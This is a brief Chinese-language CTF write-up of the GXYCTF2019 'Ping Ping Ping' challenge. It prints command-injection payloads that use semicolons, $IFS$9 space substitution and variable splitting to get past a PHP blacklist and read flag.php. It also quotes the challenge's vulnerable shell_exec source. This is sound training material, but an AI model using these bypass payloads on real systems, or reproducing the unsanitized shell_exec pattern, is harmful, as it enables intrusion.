[GXYCTF2019]Ping Ping Ping

2023-09-25 14:01:22

[GXYCTF2019]Ping Ping Ping

进入环境输个ip发现就是在ping这个ip地址，我们尝试使用分号来执行命令

发现flag.php可惜不能直接cat flag.php估计绊掉了，那我们cat index.php看看还是不行，尝试绕过了一下空格，原来空格也过滤了，这样一来源码就出来了

?ip=127.0.0.1;cat$IFS$9index.php

源码如下

/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
";
  print_r($a);
}

?>

过滤了很多东西但是发现了一种方法可以绕过

?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php

我们通过;来拼接执行执行代码，通过$IFS$9绕过空格限制，然后拼接指令即可，但这里过滤了flag，要绕过正则匹配必须fl写在后面的哪个变量中

查看源码即可发现flag

码农公寓

[GXYCTF2019]Ping Ping Ping

相关文章